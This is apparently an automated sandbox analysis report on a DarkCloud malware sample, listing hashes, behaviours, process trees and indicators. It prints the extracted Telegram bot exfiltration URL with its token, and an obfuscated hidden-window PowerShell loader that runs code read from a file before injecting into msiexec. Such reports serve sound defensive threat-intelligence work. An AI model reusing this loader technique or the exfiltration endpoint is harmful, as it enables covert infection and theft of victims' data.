Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
13/03/2025, 02:09
Static task
static1
Behavioral task
behavioral1
Sample
20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Skyldsflelsers.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Skyldsflelsers.ps1
Resource
win10v2004-20250217-en
General
-
Target
20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe
-
Size
819KB
-
MD5
969da5cc61a21e2d5fd00a52254ecd8e
-
SHA1
3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
-
SHA256
20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
-
SHA512
6df74d8e45b5db927d8962e453f379b18ba79dce91a8e0677b55a36c1a57f38c43f677091d280d1abcbcad2b214299aeb02f2784047411e2d62a6e0912556e60
-
SSDEEP
12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
Malware Config
Extracted
darkcloud
https://api.telegram.org/bot7733877678:AAEqT6ly9PGheBCvOkuDttTsF2fRwpgtX5s/sendMessage?chat_id=5039346757
Signatures
-
Darkcloud family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1640 powershell.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 36 228 msiexec.exe 38 228 msiexec.exe 40 228 msiexec.exe 42 228 msiexec.exe 44 228 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 35 drive.google.com 36 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 228 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1640 powershell.exe 228 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1640 powershell.exe 1640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe Token: SeIncreaseQuotaPrivilege 1640 powershell.exe Token: SeSecurityPrivilege 1640 powershell.exe Token: SeTakeOwnershipPrivilege 1640 powershell.exe Token: SeLoadDriverPrivilege 1640 powershell.exe Token: SeSystemProfilePrivilege 1640 powershell.exe Token: SeSystemtimePrivilege 1640 powershell.exe Token: SeProfSingleProcessPrivilege 1640 powershell.exe Token: SeIncBasePriorityPrivilege 1640 powershell.exe Token: SeCreatePagefilePrivilege 1640 powershell.exe Token: SeBackupPrivilege 1640 powershell.exe Token: SeRestorePrivilege 1640 powershell.exe Token: SeShutdownPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeSystemEnvironmentPrivilege 1640 powershell.exe Token: SeRemoteShutdownPrivilege 1640 powershell.exe Token: SeUndockPrivilege 1640 powershell.exe Token: SeManageVolumePrivilege 1640 powershell.exe Token: 33 1640 powershell.exe Token: 34 1640 powershell.exe Token: 35 1640 powershell.exe Token: 36 1640 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 228 msiexec.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 412 wrote to memory of 1640 412 20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe 86 PID 412 wrote to memory of 1640 412 20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe 86 PID 412 wrote to memory of 1640 412 20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe 86 PID 1640 wrote to memory of 2432 1640 powershell.exe 100 PID 1640 wrote to memory of 2432 1640 powershell.exe 100 PID 1640 wrote to memory of 2432 1640 powershell.exe 100 PID 1640 wrote to memory of 228 1640 powershell.exe 101 PID 1640 wrote to memory of 228 1640 powershell.exe 101 PID 1640 wrote to memory of 228 1640 powershell.exe 101 PID 1640 wrote to memory of 228 1640 powershell.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe"C:\Users\Admin\AppData\Local\Temp\20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\Admin\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵PID:2432
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:228
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
347KB
MD5b309e0c56e116ca4bb506532d3301d26
SHA1dd262120aff0dcc56ca5c142dfe9a2e0c5a754a6
SHA256f32f4655ae63807af3841e5b4f806b4cac43cc993417fc74ff0403e8037efa39
SHA5120976fa442e5ba759922f738cc0aad568573b88d941a6b1d5cf9b09643566b59736c69d75ad20f7b73c35bcc0f602e498c4498c32a7c3273a7e4729701ff2a1cb
-
Filesize
51KB
MD5550953a2f63ed2b48ebf6f76343105dc
SHA1f9425cafc739b32c655b05afdf9a5930337f2a54
SHA256f4c99919eaf75b521f3e08ec3e4378cc546a07de51735e48d7cf9110a4afec3c
SHA512956bb1f66503873a3b721875123c485ca47e7f9f9ce14ce451a2a4b0f1c705b40774ac1569bdb41e83758e880586e1f7740598b3112744e0b68720ae4e0deab3